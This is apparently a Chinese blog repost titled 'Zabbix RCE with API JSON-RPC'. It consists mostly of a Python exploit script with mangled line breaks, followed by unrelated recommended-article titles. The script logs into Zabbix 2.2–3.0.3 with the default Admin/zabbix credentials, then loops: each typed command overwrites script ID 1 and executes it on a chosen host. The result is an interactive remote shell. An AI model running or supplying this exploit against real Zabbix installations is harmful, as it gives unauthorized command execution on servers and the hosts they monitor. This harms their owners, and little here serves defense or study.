测试脚本:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3import requests
import json
import sysdef verify(url,hostid):url = url + '/api_jsonrpc.php'    ### Don't edit
login = 'Admin'        ### Zabbix loginpassword = 'zabbix'    ### Zabbix password### authpayload = {"jsonrpc" : "2.0","method" : "user.login","params": {'user': ""+login+"",'password': ""+password+"",},"auth" : None,"id" : 0,}headers = {'content-type': 'application/json',}auth  = requests.post(url, data=json.dumps(payload), headers=(headers))auth = auth.json()while True:cmd = raw_input(':~  ')if cmd == "" : print "Result of last command:"if cmd == "quit" : break### updatepayload = {"jsonrpc": "2.0","method": "script.update","params": {"scriptid": "1","command": ""+cmd+""},"auth" : auth['result'],"id" : 0,}cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))### executepayload = {"jsonrpc": "2.0","method": "script.execute","params": {"scriptid": "1","hostid": ""+hostid+""},"auth" : auth['result'],"id" : 0,}cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))cmd_exe = cmd_exe.json()print cmd_exe["result"]["value"]if __name__ == '__main__':url = sys.argv[1]hostid = sys.argv[2]verify(url,hostid)

测试截图:

转载于:https://www.cnblogs.com/persuit/p/5718048.html

Zabbix RCE with API JSON-RPC相关推荐

  1. 爱测未来开发-Zabbix的使用 API的调用

    一.zabbix的简单介绍 1.什么是zabbix zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. 2.选用zabbix的原因 开源方案:提供win32和 ...

  2. C语言编写的简单HTTP json RPC

    目录 0 概述 0.0 参考 0.1 HTTP 服务 0.2 JSON RPC HTTP错误码 0.3 目录结构 1 使用 1.1 接口访问示例 1.2 方法注册 1.3 修改监听端口 4 源码获取 ...

  3. 深入浅出Zabbix 3.0 -- 第十五章 Zabbix 协议与API

    第十五章 Zabbix 协议与API 本章将介绍和开发相关的Zabbix协议和API的内容,通过对Zabbix协议和API的深入了解,你可以利用Zabbix协议编写客户端程序并将其嵌入的产品或系统中, ...

  4. postman如何导入API.json文件 - 图文教程

    图文教程 · 示下: 以上就是关于" postman如何导入API.json文件 - 图文教程 "的全部内容.

  5. jsonrpc php使用,利用php怎么编写一个json rpc框架

    利用php怎么编写一个json rpc框架 发布时间:2020-12-25 15:24:41 来源:亿速云 阅读:71 作者:Leah 本篇文章为大家展示了利用php怎么编写一个json rpc框架, ...

  6. .NET MVC第九章、Web Api Json序列化与反序列化

    .NET MVC第九章.Web Api Json序列化与反序列化 目录 .NET MVC第九章.Web Api Json序列化与反序列化 json数据格式 JSON 语法 返回对象 Json序列化 反 ...

  7. jsonrpc php使用,php实现的一个简单json rpc框架实例

    json rpc 是一种以json为消息格式的远程调用服务,它是一套允许运行在不同操作系统.不同环境的程序实现基于Internet过程调用的规范和一系列的实现.这种远程过程调用可以使用http作为传输 ...

  8. ERRO[0000] unable to determine runtime API version: rpc error: code = Unavailable desc = connection

    遇到错误: ERRO[0000] unable to determine runtime API version: rpc error: code = Unavailable desc = conne ...

  9. ERRO[0000] unable to determine image API version: rpc error: code = Unavailable.......错误解决

    ERRO[0000] unable to determine image API version: rpc error: code = Unavailable desc = connection er ...

最新文章

  1. html怎么定位布局位置,CSS的position定位布局问题
  2. 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...
  3. C++数组参数应用方式探讨(转)
  4. android 非root app 捕捉系统广播_APP的生死之道
  5. Android实现飘动的旗帜效果实例
  6. Spring中的bean装配
  7. 虚拟机中centos7 安装过程中没有自动获取到网络
  8. 认知与思考-190820
  9. adams功能区不显示_百科Esri大赛获奖作品分享:融合OSM道路网和百度POI数据的城市功能区识别...
  10. Xshell更改用户数据文件夹的方法
  11. 关于Java的点点滴滴(1)——Static关键字
  12. Nginx正反向代理的具体步骤讲解
  13. 每日10行代码82:网上购物活动满减凑单计算器
  14. Python处理Excel求取某列固定间隔数的平均值
  15. iOS - 找出汉字拼音首字母
  16. javascript操作select元素一例
  17. Windows开启FTP服务
  18. 如何把Dom对象转换成jQuery对象,如何把jQuery对象转换成Dom对象
  19. 面了个腾讯拿28k跳槽出来的,真正见识到了跳槽天花板
  20. 百汇BCR:什么是外汇交易风险?如何尽量减少风险影响?

热门文章

  1. 如何使用 React 和 React Hooks 创建一个天气应用
  2. Linux下编译安装Mysql简单步骤
  3. 《JavaScript模式》读书笔记一:基本技巧
  4. Js中的for in
  5. 初探mysql数据库模式(一)
  6. 操作主机 RID matser
  7. 安装Linux后的遗留问题
  8. Extjs中使用FusionChart举例
  9. Linux bc 命令简单学习
  10. MapReduce详解和WordCount模拟